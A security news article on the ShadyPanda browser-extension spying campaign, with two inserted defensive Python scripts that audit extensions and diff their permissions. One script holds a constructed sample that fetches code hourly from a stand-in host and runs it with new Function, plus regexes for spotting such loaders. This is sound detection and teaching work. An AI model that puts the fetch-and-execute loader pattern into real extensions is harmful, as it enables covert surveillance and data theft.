ShadyPanda Spying Campaign Exposed – Millions of Users Compromised

A persistent cyber threat group, identified as ShadyPanda, masterminded a sophisticated seven-year operation centered on compromised browser extensions, quietly infiltrating over 4.3 million user devices. This extensive campaign demonstrates an alarming exploitation of trust, leveraging seemingly innocuous productivity tools to siphon vast amounts of private data.

From Trust to Treachery: The Great Extension Betrayal

The initial phase of the campaign involved a deceptive shift from legitimate services to malicious spyware. As detailed in a report by Koi Security, five of the compromised extensions initially started as genuine, useful applications. However, in mid-2024, the developers introduced hidden, harmful updates, transforming them into digital spies. Before they were eventually taken down, these specific extensions had already amassed roughly 300,000 installations.

Security researcher Tuval Admoni highlighted the severity of the threat, stating that the updated extensions were set up for hourly remote code execution. This means they could download and run any arbitrary JavaScript, granting them total access to the user’s browser environment. The extensions were actively engaging in comprehensive surveillance: they monitored every website visit, stole encrypted browsing history, and created a complete digital fingerprint of the user’s browser.

In a move that further cemented the group’s deceit, one of the primary extensions, Clean Master, had even received official verification and was featured by Google. This endorsement effectively gave the attackers a veneer of legitimacy, allowing them to dramatically increase their user base and deploy their malicious updates years later without triggering user or marketplace suspicion. The sheer volume of users allowed the threat actors to execute a slow-burn strategy, weaponizing the very mechanism—the auto-update process—that is designed to keep users safe.

The scale of the operation is staggering. A separate collection of five add-ons from the same publishers was engineered for extensive user tracking. These tools meticulously recorded every single URL visited, captured all search engine queries, and logged mouse clicks, transmitting this sensitive information to servers believed to be located in China. This second set of extensions accounted for a massive four million installs, with the popular WeTab extension alone making up three million of those users.

Early warning signs of the campaign surfaced in 2023, with dozens of malicious extensions popping up on both the Chrome Web Store (20) and Microsoft Edge Addons hub (125), published under the developer names “nuggetsno15” and “rocket Zhang.” These apps were cleverly disguised as wallpaper or simple productivity tools.

Initially, their malicious activities focused on affiliate fraud. They secretly inserted tracking codes when users shopped on sites like eBay, Booking.com, or Amazon, illegally earning commissions from purchases made by the unsuspecting users.

Hijacking Searches and Stealing Data

The operation escalated significantly in early 2024. The attackers shifted their focus from passive fraud to active browser manipulation. This included redirecting users’ search queries, actively harvesting search terms, and even stealing cookies from specific websites.

One key tactic involved routing all web searches through trovi.com, a domain known to be associated with browser hijacking. Koi Security’s report noted that this action allowed the attackers to log, monetize, and sell search queries, and even manipulate the search results for their financial gain.

By mid-2024, the campaign entered a more dangerous phase. Several extensions were modified to include backdoor functionality. Once every hour, they would connect to a specific domain (“api.extensionplay[.]com”) to download and execute a JavaScript payload. This payload was the core surveillance tool, designed to monitor and encrypt every user web visit before sending the stolen data—along with a detailed browser fingerprint—to a ShadyPanda server (“api.cleanmasters[.]store”). To avoid detection, the code was heavily disguised, and it was programmed to stop its malicious behavior instantly if the browser’s developer tools were opened.
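The backdoor pattern described above (a periodic timer, a fetch of JavaScript from a remote host, dynamic execution of whatever came back, and a check for open developer tools) leaves static traces in an extension's manifest and scripts. The following is an added example of a heuristic audit for those traces; it is not code from Koi Security or from the extensions discussed, and the manifest and script it scans are constructed samples that imitate the shape of the pattern without a working payload. The indicator names, the permission list and the verdict thresholds are the example's own assumptions.

```python
"""Heuristic static audit of a browser-extension package for the traits
described in the article: broad permissions, a periodic alarm, remote
fetch of code, dynamic execution, and developer-tools detection."""
import json
import re
from typing import Dict, List

# Constructed sample extension (not a real package). It mimics the
# hourly "fetch then execute" shape but contains no functioning payload.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 3,
    "name": "Sample Cleaner (constructed)",
    "version": "2.1.0",
    "permissions": ["alarms", "cookies", "history", "tabs", "webRequest"],
    "host_permissions": ["<all_urls>"],
    "background": {"service_worker": "bg.js"},
})

SAMPLE_BG_JS = r"""
chrome.alarms.create("sync", { periodInMinutes: 60 });
chrome.alarms.onAlarm.addListener(async () => {
  const r = await fetch("https://update.example-c2.invalid/p.js");
  const code = await r.text();
  if (window.outerWidth - window.innerWidth > 160) return; // devtools open?
  new Function(code)();
});
"""

# A benign constructed script for comparison: no timer, no remote code.
BENIGN_BG_JS = r"""
chrome.runtime.onInstalled.addListener(() => console.log("installed"));
"""

# Regexes for the individual traits. Each one alone is weak evidence
# (legitimate extensions use alarms and fetch); the combination matters.
JS_INDICATORS = {
    "dynamic_eval": re.compile(r"\b(eval|new\s+Function)\s*\("),
    "periodic_alarm": re.compile(r"chrome\.alarms\.create\s*\("),
    "remote_fetch": re.compile(r"\bfetch\s*\(\s*['\"]https?://"),
    "devtools_check": re.compile(r"outerWidth\s*-\s*(window\.)?innerWidth|\bdebugger\b"),
}

# Permissions that give a remotely loaded script the reach described
# in the article (history, cookies, every site). Assumed list for the example.
RISKY_PERMISSIONS = {
    "cookies", "history", "webRequest", "webRequestBlocking", "tabs", "<all_urls>",
}


def audit_manifest(manifest_text: str) -> List[str]:
    """Return the risky permissions the manifest declares, sorted."""
    m = json.loads(manifest_text)
    declared = set(m.get("permissions", [])) | set(m.get("host_permissions", []))
    return sorted(declared & RISKY_PERMISSIONS)


def audit_script(js: str) -> List[str]:
    """Return the names of every indicator regex that matches the script."""
    return sorted(name for name, rx in JS_INDICATORS.items() if rx.search(js))


def audit_extension(manifest_text: str, js: str) -> Dict[str, object]:
    """Combine manifest and script findings into a simple verdict."""
    perms = audit_manifest(manifest_text)
    hits = audit_script(js)
    # Remote fetch plus dynamic execution is the remote-code-execution shape.
    rce = "remote_fetch" in hits and "dynamic_eval" in hits
    if rce and perms:
        verdict = "review_urgently"
    elif rce or hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "risky_permissions": perms,
        "indicators": hits,
        "remote_code_execution": rce,
        "verdict": verdict,
    }


if __name__ == "__main__":
    print(json.dumps(audit_extension(SAMPLE_MANIFEST, SAMPLE_BG_JS), indent=2))
    print(json.dumps(audit_extension(SAMPLE_MANIFEST, BENIGN_BG_JS), indent=2))
```

Running the audit over an unpacked extension directory means reading its manifest.json and concatenating its scripts before calling audit_extension; the regexes are deliberately simple, so obfuscated code (the article notes the payload loader was heavily disguised) can evade them, which is why the permission set is weighed alongside the script findings rather than either alone.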

The Final Stage: Full Espionage and Credential Theft

The threat expanded to allow Adversary-in-the-Middle (AitM) attacks. This advanced capability put users at risk of credential theft, session hijacking, and the injection of arbitrary code into any website they visited.

The final observed stage centered on the extensions published around 2023 on the Microsoft Edge Addons hub, including the widely used WeTab (which is reportedly still available for download). With its massive install base, this set of extensions became a comprehensive surveillance platform, gathering every visited URL, all search queries, mouse clicks, cookies, and browser fingerprints. They were also capable of tracking user interactions on a webpage, such as scrolling behavior and time spent viewing content.

The campaign’s success, according to Koi Security, was not simply due to technical skill but to a sustained exploitation of a fundamental security flaw: app marketplaces review extensions only upon submission, but they do not actively monitor what happens after they are approved and silently updated.
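Because the marketplace review happens once and updates arrive silently, the practical defence on the endpoint is to keep a baseline of what is installed and alert when an extension's code or permissions change. The following is an added example of such a baseline-and-diff check; it is not code from Koi Security or from any browser vendor. It works on an in-memory map of extension files so it runs offline; the extension id, versions, permissions and file contents are constructed samples, and the finding strings are the example's own format.

```python
"""Snapshot installed extensions (version, declared permissions, content
hash) and report what changed between two snapshots, so that a silent
update that adds reach or swaps code out is surfaced."""
import hashlib
import json
from typing import Dict, List

# installed-extension layout used throughout: {ext_id: {filename: content}}
ExtensionFiles = Dict[str, Dict[str, str]]


def fingerprint(files: Dict[str, str]) -> str:
    """SHA-256 over sorted (name, content) pairs; stable regardless of dict order."""
    h = hashlib.sha256()
    for name in sorted(files):
        h.update(name.encode())
        h.update(b"\0")
        h.update(files[name].encode())
        h.update(b"\0")
    return h.hexdigest()


def snapshot(installed: ExtensionFiles) -> Dict[str, dict]:
    """Reduce each installed extension to version, permissions and a content hash."""
    out = {}
    for ext_id, files in installed.items():
        manifest = json.loads(files["manifest.json"])
        perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
        out[ext_id] = {
            "version": manifest.get("version"),
            "permissions": sorted(perms),
            "hash": fingerprint(files),
        }
    return out


def diff_snapshots(old: Dict[str, dict], new: Dict[str, dict]) -> List[str]:
    """Return human-readable findings for every change between two snapshots."""
    findings = []
    for ext_id, cur in new.items():
        prev = old.get(ext_id)
        if prev is None:
            findings.append(f"{ext_id}: newly installed (v{cur['version']})")
            continue
        if cur["hash"] != prev["hash"]:
            if cur["version"] == prev["version"]:
                # Same version string but different bytes: the most suspicious case.
                findings.append(f"{ext_id}: code changed without a version bump")
            else:
                findings.append(f"{ext_id}: updated {prev['version']} -> {cur['version']}")
        added = sorted(set(cur["permissions"]) - set(prev["permissions"]))
        if added:
            findings.append(f"{ext_id}: new permissions {added}")
    for ext_id in old.keys() - new.keys():
        findings.append(f"{ext_id}: removed")
    return findings


# Constructed sample: a benign-looking utility before and after a silent
# update that adds history/cookie access and every-site reach.
BEFORE: ExtensionFiles = {
    "sampleext": {
        "manifest.json": json.dumps({"version": "1.4.0", "permissions": ["storage"]}),
        "bg.js": "chrome.runtime.onInstalled.addListener(() => {});",
    }
}
AFTER: ExtensionFiles = {
    "sampleext": {
        "manifest.json": json.dumps({
            "version": "1.5.0",
            "permissions": ["storage", "cookies", "history", "webRequest"],
            "host_permissions": ["<all_urls>"],
        }),
        "bg.js": "chrome.alarms.create('t', { periodInMinutes: 60 });",
    }
}
# Same version string as BEFORE, but the script body differs.
SILENT: ExtensionFiles = {
    "sampleext": {
        "manifest.json": BEFORE["sampleext"]["manifest.json"],
        "bg.js": "chrome.alarms.create('t', { periodInMinutes: 60 });",
    }
}


if __name__ == "__main__":
    for line in diff_snapshots(snapshot(BEFORE), snapshot(AFTER)):
        print(line)
    for line in diff_snapshots(snapshot(BEFORE), snapshot(SILENT)):
        print(line)
```

In practice the "installed" map is built by walking the browser profile's extension directory and reading each unpacked version's files, the first snapshot is stored (for example as JSON) as the baseline, and the diff is run on a schedule; a new-permissions or code-changed-without-bump finding is the cue to re-review an extension that was trusted at install time.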
